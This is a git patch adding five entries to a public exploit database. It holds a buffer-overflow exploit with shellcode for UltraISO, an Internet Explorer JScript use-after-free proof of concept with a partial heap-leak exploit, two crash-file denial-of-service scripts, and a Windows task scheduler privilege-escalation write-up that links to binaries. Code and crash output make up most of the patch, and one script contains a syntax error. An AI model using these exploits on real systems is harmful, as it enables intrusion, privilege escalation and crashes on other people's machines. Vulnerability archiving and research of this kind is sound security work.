From ef80d216466c2342b9c3501fe470ba6bb0b5c5d4 Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Wed, 29 Aug 2018 05:01:57 +0000
Subject: [PATCH] DB: 2018-08-29

5 changes to exploits/shellcodes

Cisco Network Assistant 6.3.3 - 'Cisco Login' Denial of Service (PoC)
Instagram App 41.1788.50991.0 - Denial of Service (PoC)
Microsoft Windows - JScript RegExp.lastIndex Use-After-Free
UltraISO 9.7.1.3519 - Buffer Overflow (SEH)
Microsoft Windows - Advanced Local Procedure Call (ALPC) Local Privilege Escalation

WordPress Plugin Plainview Activity Monitor 20161228 - Command Injection
WordPress Plugin Plainview Activity Monitor 20161228 - (Authenticated) Command Injection
---
 exploits/windows/dos/45275.py          |  23 ++++
 exploits/windows/dos/45279.html        | 184 +++++++++++++++++++++++++
 exploits/windows/local/45280.txt       |  55 ++++++++
 exploits/windows_x86-64/dos/45277.py   |  28 ++++
 exploits/windows_x86-64/local/45278.py |  52 +++++++
 files_exploits.csv                     |   7 +-
 6 files changed, 348 insertions(+), 1 deletion(-)
 create mode 100755 exploits/windows/dos/45275.py
 create mode 100644 exploits/windows/dos/45279.html
 create mode 100644 exploits/windows/local/45280.txt
 create mode 100755 exploits/windows_x86-64/dos/45277.py
 create mode 100755 exploits/windows_x86-64/local/45278.py

diff --git a/exploits/windows/dos/45275.py b/exploits/windows/dos/45275.py
new file mode 100755
index 000000000..e10a6a660
--- /dev/null
+++ b/exploits/windows/dos/45275.py
@@ -0,0 +1,23 @@
+# Exploit Title: Cisco Network Assistant 6.3.3 - 'Cisco Login' Denial of Service (PoC)
+# Discovery by: Luis Martinez
+# Discovery Date: 2018-08-27
+# Vendor Homepage: https://www.cisco.com/
+# Software Link : https://software.cisco.com/download/home/286277276/type/280775097/release/6.3.3
+# Tested Version: 6.3.3
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: Windows 10 Pro x64 es
+
+# Steps to Produce the Crash: 
+# 1.- Run python code : python Cisco_Network_Assistant_6.3.3.py
+# 2.- Open Cisco_Network_Assistant_6.3.3.txt and copy content to clipboard
+# 3.- Open Cisco Network Assistant
+# 4.- Authenticate to Cisco CCO
+# 5.- Paste ClipBoard on "Cisco Login"
+# 6.- Crashed
+
+#!/usr/bin/env python
+ 
+buffer = "\x41" * 6900000
+f = open ("Cisco_Network_Assistant_6.3.3.txt", "w")
+f.write(buffer)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/45279.html b/exploits/windows/dos/45279.html
new file mode 100644
index 000000000..c675f6f12
--- /dev/null
+++ b/exploits/windows/dos/45279.html
@@ -0,0 +1,184 @@
+<!--
+There is a use-after-free vulnerability in jscript.dll related to how the lastIndex property of a RegExp object is handled. This vulnerability can be exploited through Internet Explorer or potentially through WPAD over local network. The vulnerability has been reproduced on multiple Windows versions with the most recent patches applied.
+
+The issue is that lastIndex property of a RegExp object is not tracked by the garbage collector. If you look at RegExpObj::LastIndex you'll see that, on x64, lastIndex gets stored in a VAR at offset 272 (at least in my version), but if you take a look at RegExpObj::ScavengeCore (which gets called by the garbage collector to track various member variables) you'll notice that that offset is not being tracked. This allows an attacker to set the lastIndex property, and after the garbage collector gets trigger, the corresponding variable is going to get freed. As JavaScript variables are all allocated in blocks by a custom allocator, to turn this into a crash the entire block of variables needs to get freed. This is similar to some already reported issues, e.g. https://bugs.chromium.org/p/project-zero/issues/detail?id=1506
+
+PoC for IE:
+
+=========================================================
+
+<meta http-equiv="X-UA-Compatible" content="IE=8"></meta>
+<script language="Jscript.Encode">
+
+alert('start');
+
+var vars = [];
+
+var r = new RegExp();
+
+for(var i=0; i<20000; i++) {
+  vars[i] = "aaaaa";
+}
+r.lastIndex = "aaaaa";
+for(var i=20000; i<40000; i++) {
+  vars[i] = "aaaaa";
+}
+
+vars.length = 0;
+
+CollectGarbage();
+
+alert(r.lastIndex);
+
+alert('failed');
+
+</script>
+
+=========================================================
+
+
+Crash log:
+
+=========================================================
+
+(760.650): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+jscript!PrepareInvoke+0x2b1:
+000007fe`f26674f1 66390f          cmp     word ptr [rdi],cx ds:00000000`04878e98=????
+0:014> r
+rax=0000000000000000 rbx=000000000000400c rcx=000000000000008f
+rdx=0000000000000000 rsi=0000000000000000 rdi=0000000004878e98
+rip=000007fef26674f1 rsp=000000001268b080 rbp=0000000000000080
+ r8=0000000004095f50  r9=0000000000000008 r10=000000000000000b
+r11=0000000000000005 r12=0000000000000000 r13=000000001268b158
+r14=0000000004095f68 r15=0000000000000001
+iopl=0         nv up ei pl zr na po nc
+cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
+jscript!PrepareInvoke+0x2b1:
+000007fe`f26674f1 66390f          cmp     word ptr [rdi],cx ds:00000000`04878e98=????
+0:014> k
+ # Child-SP          RetAddr           Call Site
+00 00000000`1268b080 000007fe`f26505d4 jscript!PrepareInvoke+0x2b1
+01 00000000`1268b0f0 000007fe`f2674343 jscript!InvokeDispatchEx+0xb4
+02 00000000`1268b280 000007fe`f263600b jscript!VAR::InvokeByDispID+0x3e303
+03 00000000`1268b2d0 000007fe`f2636ee2 jscript!CScriptRuntime::Run+0x3a0c
+04 00000000`1268b680 000007fe`f2636d4b jscript!ScrFncObj::CallWithFrameOnStack+0x162
+05 00000000`1268b890 000007fe`f2636bb5 jscript!ScrFncObj::Call+0xb7
+06 00000000`1268b930 000007fe`f263b690 jscript!CSession::Execute+0x19e
+07 00000000`1268ba00 000007fe`f2644027 jscript!COleScript::ExecutePendingScripts+0x17a
+08 00000000`1268bad0 000007fe`f2643826 jscript!COleScript::ParseScriptTextCore+0x267
+09 00000000`1268bbc0 000007fe`e8effdd1 jscript!COleScript::ParseScriptText+0x56
+0a 00000000`1268bc20 000007fe`e9661d3c MSHTML!CActiveScriptHolder::ParseScriptText+0xc1
+0b 00000000`1268bca0 000007fe`e8f00d96 MSHTML!CScriptCollection::ParseScriptText+0x37f
+0c 00000000`1268bd80 000007fe`e8f007d1 MSHTML!CScriptData::CommitCode+0x3d9
+0d 00000000`1268bf50 000007fe`e8f00561 MSHTML!CScriptData::Execute+0x283
+0e 00000000`1268c010 000007fe`e9663655 MSHTML!CHtmScriptParseCtx::Execute+0x101
+0f 00000000`1268c050 000007fe`e8ee86c7 MSHTML!CHtmParseBase::Execute+0x235
+10 00000000`1268c0f0 000007fe`e8e5ba49 MSHTML!CHtmPost::Broadcast+0x90
+11 00000000`1268c130 000007fe`e8ec282f MSHTML!CHtmPost::Exec+0x4bb
+12 00000000`1268c340 000007fe`e8ec2780 MSHTML!CHtmPost::Run+0x3f
+13 00000000`1268c370 000007fe`e8ec4532 MSHTML!PostManExecute+0x70
+14 00000000`1268c3f0 000007fe`e8ec7f43 MSHTML!PostManResume+0xa1
+15 00000000`1268c430 000007fe`e8ea5fb8 MSHTML!CHtmPost::OnDwnChanCallback+0x43
+16 00000000`1268c480 000007fe`e96d488f MSHTML!CDwnChan::OnMethodCall+0x41
+17 00000000`1268c4b0 000007fe`e8dc9dc5 MSHTML!GlobalWndOnMethodCall+0x254
+18 00000000`1268c550 00000000`76e79bbd MSHTML!GlobalWndProc+0x150
+19 00000000`1268c5d0 00000000`76e798c2 USER32!UserCallWinProcCheckWow+0x1ad
+1a 00000000`1268c690 000007fe`effe42fe USER32!DispatchMessageWorker+0x3b5
+1b 00000000`1268c710 000007fe`f004ad2b IEFRAME!CTabWindow::_TabWindowThreadProc+0x555
+1c 00000000`1268f990 000007fe`fec5a2cf IEFRAME!LCIETab_ThreadProc+0x3a3
+1d 00000000`1268fac0 000007fe`f77e925f iertutil!_IsoThreadProc_WrapperToReleaseScope+0x1f
+1e 00000000`1268faf0 00000000`76d559cd IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x9f
+1f 00000000`1268fb40 00000000`76fb383d kernel32!BaseThreadInitThunk+0xd
+20 00000000`1268fb70 00000000`00000000 ntdll!RtlUserThreadStart+0x1d
+
+=========================================================
+
+
+Attached is a started-but-never-finished exploit that only leaks the heap address of the use-after-free allocation. It was tested against IE in 64-bit single process mode (via TabProcGrowth registry flag). In a 32-bit process (default) the structure sizes/offsets would likely be different so it would not work as is.
+-->
+
+<!-- saved from url=(0014)about:internet -->
+<meta http-equiv="X-UA-Compatible" content="IE=7"></meta>
+<script language="Jscript.Encode">
+
+var objects = [];
+var regexps = [];
+var magicIndex = 0;
+var magicObject;
+var allocationAddress;
+
+function infoLeak() {
+   // alert("in infoleak");
+   // leak the "next" pointer from one of the NameList entries
+   allocationAddress = regexps[magicIndex + 6].lastIndex / 4.9406564584124654E-324 - 0x560;
+   prompt("allocationAddress", allocationAddress.toString(16));
+}
+
+// specially crafted property name that allows us to test for successful exploitation
+// and figure out which object got reallocated over freed block
+function getName4(index) {
+  return String.fromCharCode(0,0,0,0,0,0,0,0, 3,0,0,0, index,0,0,0, 0,0,0,0, 3,0,0,0, 0x1337,0,0,0, 0,0,0,0);
+}
+
+function exploit() {
+
+  // todo: trigger LFH for 0x970 allocation size, might make the exploit more reliable
+
+  alert('start');
+
+  // crafted property names
+  var name1 = Array(570).join('a'); // makes NameList allocation of exactly 0x970 bytes
+  var name2 = 'bbbbbbbbbbb'; // length chosen to allign the next item correctly
+  var name3 = String.fromCharCode(5); // 5 is the double var type, used to leak the "next" pointer
+
+  // allocate empty objects
+  for(var i=0; i<500; i++) {
+    var o = {};
+    objects[i] = o;
+  }
+
+  // allocate regexp objects
+  for(var i=0;i<10000;i++) {
+    regexps[i] = new RegExp();
+  }
+
+  // allocate variables that aren't being tracked by GC
+  for(var i=0;i<10000;i++) {
+    regexps[i].lastIndex = "aaaaa";
+  }
+
+  // trigger freeing of var blocks
+  CollectGarbage();
+
+  // allocate NameList blocks over freed allocations
+  for(var i=0; i<500; i++) {
+    objects[i][name1] = 1;
+  }
+
+  // fill NameList blocks with other data useful for infolek stage
+  for(var i=0; i<500; i++) {
+    objects[i][name2] = 1;
+    objects[i][name3] = 1;
+    objects[i][getName4(i)] = 1;
+  }
+
+  for(var i=0;i<10000;i++) {
+    try {
+      if(regexps[i].lastIndex == 0x1337) {
+        alert("win");
+        magicIndex = i;
+        magicObject = objects[regexps[i+1].lastIndex];
+        infoLeak();
+        return;
+      }
+    } catch(e) { }
+  }
+
+  alert('failed');
+}
+
+exploit();
+
+</script>
\ No newline at end of file
diff --git a/exploits/windows/local/45280.txt b/exploits/windows/local/45280.txt
new file mode 100644
index 000000000..6d0f5da7d
--- /dev/null
+++ b/exploits/windows/local/45280.txt
@@ -0,0 +1,55 @@
+(Note: PoC will now hijack the print spooler service - spoolsv.exe - as it required less code then hijacking printfilterpipelinesvc.exe, which was shown in the original video demo)
+
+Description of the vulnerability
+
+The task scheduler service has an alpc endpoint, supporting the method “SchRpcSetSecurity”.
+
+The prototype looks like this:
+
+	long _SchRpcSetSecurity(
+		[in][string] wchar_t* arg_1, //Task name
+		[in][string] wchar_t* arg_2, //Security Descriptor string
+		[in]long arg_3);
+
+Tasks created by the task scheduler will create a corresponding folder/file in c:\windows\system32\tasks. This function seems to be designed to write the DACL of tasks located there, and will do so while impersonating. However, for some reason it will also check if a .job file exists under c:\windows\tasks and try to set the DACL while not impersonating. Since a user, and even a user belonging to the guests group can create files in this folder, we can simply create a hardlink to another file (all we need is read access). Because of the hardlink, we can let the task scheduler write an arbitrary DACL (see second parameter of SchRpcSetSecurity) to a file of our choosing.
+
+So any file that we have read access over as a user and that system has the write DACL permission for, we can pivot into full control and overwrite it.
+
+Exploitation
+
+This vulnerability gives us a really strong primitive! The main issue is that in a default installation, a lot of critical files can only be modified by trusted installer (not even system).
+
+I have included a powershell script to enumerate files you can take control over. Just run ./enumerate.ps1 > output.txt
+
+There are still a lot of targets (Also, you can take control of things in program files, and if the target is shared by admins/other users, they potentially end up running programs you can overwrite)! 
+
+The second issue is, while we can take control of all these files, writing to them is often blocked since many dlls are already loaded somewhere, thus will trigger a sharing violation. 
+
+There may be file types besides .dll’s that would be a better target.
+
+C:\Windows\System32\DriverStore\FileRepository\prnms003.inf_amd64_4592475aca2acf83\Amd64\printconfig.dll (Folder name might vary.. but I accounted for that in my PoC)
+
+This was one of the dlls I got a hit on. It seems to relate to the xps printer, and is not loaded into the print spooler service by default (it might happen that its loaded already.. but more often its not it seems). 
+
+So if we start a print job using the xps printer, it will load this dll, which we can overwrite with our vulnerability.
+This hijacking vector can be easily swapped out for something better. I can try to find better alternatives.. just let me know.
+
+(edit: On an old laptop which has been running win10 for a few years.. there where two prnms003.inf_amd64_* folders. The newer version didn’t delete the older one, and there is no garantuee that FindFirstFile as used in the PoC will target the newest.. so you may want to expand this and add FindNextFile to overwrite printconfig.dll in any hits you get on prnms003.inf_amd64_*, or check the last modified attribute and only overwrite the newest.)
+
+Payload and extra considerations
+
+The payload (which is used to overwrite our target dll/file), is attached as a resource in the visual studio project, you can change it there or change exploit.dll under the folder resource.
+
+Also in code will be the following line:
+
+	HMODULE mod = GetModuleHandle(L"ALPC-TaskSched-LPE");
+
+This has to reflect the name of the final dll, or the PoC won’t work, since it won’t know where to fetch the payload resource.
+
+Should the PoC not work, check spoolsv.exe in process explorer and make sure printconfig.dll is not already loaded. It should not happen often.. but it might for whatever reason..
+
+Included a new video demo, you should see those results while reproducing (tested on 64-bit, you need some extra work for x86 support, since the payload is x64, and you need to overwrite the x86 version of printconfig.dll instead too).
+
+Again, if anything needs changing, needs extra features, or if you need a more reliable hijacking vector, just let me know.
+
+Download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/45280.rar
\ No newline at end of file
diff --git a/exploits/windows_x86-64/dos/45277.py b/exploits/windows_x86-64/dos/45277.py
new file mode 100755
index 000000000..0492631f7
--- /dev/null
+++ b/exploits/windows_x86-64/dos/45277.py
@@ -0,0 +1,28 @@
+# Exploit Title: Instagram App 41.1788.50991.0 - Denial of Service (PoC)
+# Exploit Author : Ali Alipour
+# Date: 2018-08-25
+# Vendor Homepage : https://www.instagram.com/
+# Software Link Download : https://www.microsoft.com/en-us/p/instagram/9nblggh5l9xt?ocid=blitz_windowsblog&activetab=pivot%3aoverviewtab
+# About : https://blogs.windows.com/windowsexperience/2016/10/13/instagram-app-for-windows-10-expands-to-pc-and-tablets/#SKp37OKfVaj7FRee.97
+# Tested on : Windows 10 - 64-bit
+
+# Steps to Reproduce
+# Run the python exploit script, it will create a new 
+# file with the name "Instagram.txt" just copy the text inside "Instagram.txt"
+# and start the Instagram App - In Microsoft Windows 10 . 
+# In The New Window Click " Sign Up With Phone Or Email " And Select Email Tab. 
+# Now Paste The Content Of "Instagram.txt" Into The Field: " Email Address ". 
+# Click "Next" And You Will See a [ Boom !!!! ] - Instagram App - In Microsoft Windows 10 Crash.
+
+#!/usr/bin/python
+    
+buffer = "A" * 60000
+payload = buffer
+try:
+    f=open("Instagram.txt",22"w")
+    print "[+] Creating %s bytes evil payload.." %len(payload)
+    f.write(payload)
+    f.close()
+    print "[+] File created!"
+except:
+    print "File cannot be created"
\ No newline at end of file
diff --git a/exploits/windows_x86-64/local/45278.py b/exploits/windows_x86-64/local/45278.py
new file mode 100755
index 000000000..43a3e8818
--- /dev/null
+++ b/exploits/windows_x86-64/local/45278.py
@@ -0,0 +1,52 @@
+# Exploit Title: UltraISO 9.7.1.3519 - Buffer Overflow (SEH)
+# Date: 2018-08-23
+# Author: Shubham Singh
+# Known As: Spirited Wolf [Twitter: @Pwsecspirit]
+# Vendor Homepage:   https://www.ultraiso.com
+# Software Link Download : https://www.ultraiso.com/download.html
+# Tested on: Windows 7 Ultimate - 64-bit 
+# Steps to Reproduce:
+# 1. Run the python exploit script, it will create a new 
+# 2. File with the name "exploit.txt" just copy the text inside "exploit.txt"
+# 3. start the UltraISO program. 
+# 4. In the new window click "Tools" > "Mount To Virtual Drive" . 
+# 5. Now Paste the content of "exploit.txt" into the field: " Image File ". 
+# 6. Click "Mount" and you will see a lot of calculators.
+# Thanks: corelanc0d3r and PeaceMaker 
+
+#!/usr/bin/env python
+
+#Badchars \x00\x0a\x0d
+shellcode  = "\x31\xdb\x64\x8b\x7b\x30\x8b\x7f"
+shellcode += "\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b"
+shellcode += "\x77\x20\x8b\x3f\x80\x7e\x0c\x33"
+shellcode += "\x75\xf2\x89\xc7\x03\x78\x3c\x8b"
+shellcode += "\x57\x78\x01\xc2\x8b\x7a\x20\x01"
+shellcode += "\xc7\x89\xdd\x8b\x34\xaf\x01\xc6"
+shellcode += "\x45\x81\x3e\x43\x72\x65\x61\x75"
+shellcode += "\xf2\x81\x7e\x08\x6f\x63\x65\x73"
+shellcode += "\x75\xe9\x8b\x7a\x24\x01\xc7\x66"
+shellcode += "\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7"
+shellcode += "\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9"
+shellcode += "\xb1\xff\x53\xe2\xfd\x68\x63\x61"
+shellcode += "\x6c\x63\x89\xe2\x52\x52\x53\x53"
+shellcode += "\x53\x53\x53\x53\x52\x53\xff\xd7"
+#Exit intermodular call
+shellcode += "\xB8\x8A\x70\xA0\xFF\xF7\xD8\x50\xC3" 
+fill = "\x42" * (126 - len(shellcode))
+junk = "A" * (1064 - len(shellcode) - len(fill))
+#0x005540e9 : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [UltraISO.exe]
+#ASLR: False, Rebase: False, SafeSEH: False, OS: False, v9.7.1.3519 (C:\Program Files (x86)\UltraISO\UltraISO.exe)
+sjmp = "\xeb\x80\xCC\xCC"
+seh = "\xe9\x40\x55"
+
+ 
+spirit = junk + shellcode + fill + sjmp + seh
+try:
+    f=open("exploit.txt","w")
+    print "[+] Creating %s bytes evil payload.." %len(spirit)
+    f.write(spirit)
+    f.close()
+    print "[+] File created!"
+except:
+    print "File cannot be created"
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index d6e97e7b6..9e6e70620 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -6071,6 +6071,9 @@ id,file,description,date,author,type,platform,port
 45261,exploits/ios/dos/45261.py,"Trend Micro Enterprise Mobile Security 2.0.0.1700 - 'Servidor' Denial of Service (PoC)",2018-08-27,"Luis Martínez",dos,ios,
 45263,exploits/linux/dos/45263.sh,"Libpango 1.40.8 - Denial of Service (PoC)",2018-08-27,"Jeffery M",dos,linux,
 45268,exploits/linux/dos/45268.txt,"Adobe Flash - AVC Processing Out-of-Bounds Read",2018-08-27,"Google Security Research",dos,linux,
+45275,exploits/windows/dos/45275.py,"Cisco Network Assistant 6.3.3 - 'Cisco Login' Denial of Service (PoC)",2018-08-28,"Luis Martínez",dos,windows,
+45277,exploits/windows_x86-64/dos/45277.py,"Instagram App 41.1788.50991.0 - Denial of Service (PoC)",2018-08-28,"Ali Alipour",dos,windows_x86-64,
+45279,exploits/windows/dos/45279.html,"Microsoft Windows - JScript RegExp.lastIndex Use-After-Free",2018-08-28,"Google Security Research",dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -9907,6 +9910,8 @@ id,file,description,date,author,type,platform,port
 45250,exploits/windows_x86/local/45250.py,"StyleWriter 4 1.0 - Denial of Service (PoC)",2018-08-23,"Gionathan Reale",local,windows_x86,
 45259,exploits/windows_x86/local/45259.py,"CuteFTP 5.0 - Buffer Overflow",2018-08-27,"Matteo Malvica",local,windows_x86,
 45269,exploits/windows/local/45269.rb,"Foxit PDF Reader 9.0.1.1049 - Pointer Overwrite Use-After-Free (Metasploit)",2018-08-27,Metasploit,local,windows,
+45278,exploits/windows_x86-64/local/45278.py,"UltraISO 9.7.1.3519 - Buffer Overflow (SEH)",2018-08-28,"Shubham Singh",local,windows_x86-64,
+45280,exploits/windows/local/45280.txt,"Microsoft Windows - Advanced Local Procedure Call (ALPC) Local Privilege Escalation",2018-08-28,SandboxEscaper,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -39873,4 +39878,4 @@ id,file,description,date,author,type,platform,port
 45267,exploits/php/webapps/45267.py,"LiteCart 2.1.2 - Arbitrary File Upload",2018-08-27,"Haboob Team",webapps,php,
 45270,exploits/hardware/webapps/45270.txt,"Seagate Personal Cloud SRN21C 4.3.16.0 / 4.3.18.0 - SQL Injection",2018-08-27,"Yorick Koster",webapps,hardware,
 45271,exploits/php/webapps/45271.txt,"Responsive FileManager < 9.13.4 - Directory Traversal",2018-08-27,"Simon Uvarov",webapps,php,80
-45274,exploits/php/webapps/45274.html,"WordPress Plugin Plainview Activity Monitor 20161228 - Command Injection",2018-08-27,"Lydéric Lefebvre",webapps,php,80
+45274,exploits/php/webapps/45274.html,"WordPress Plugin Plainview Activity Monitor 20161228 - (Authenticated) Command Injection",2018-08-27,"Lydéric Lefebvre",webapps,php,80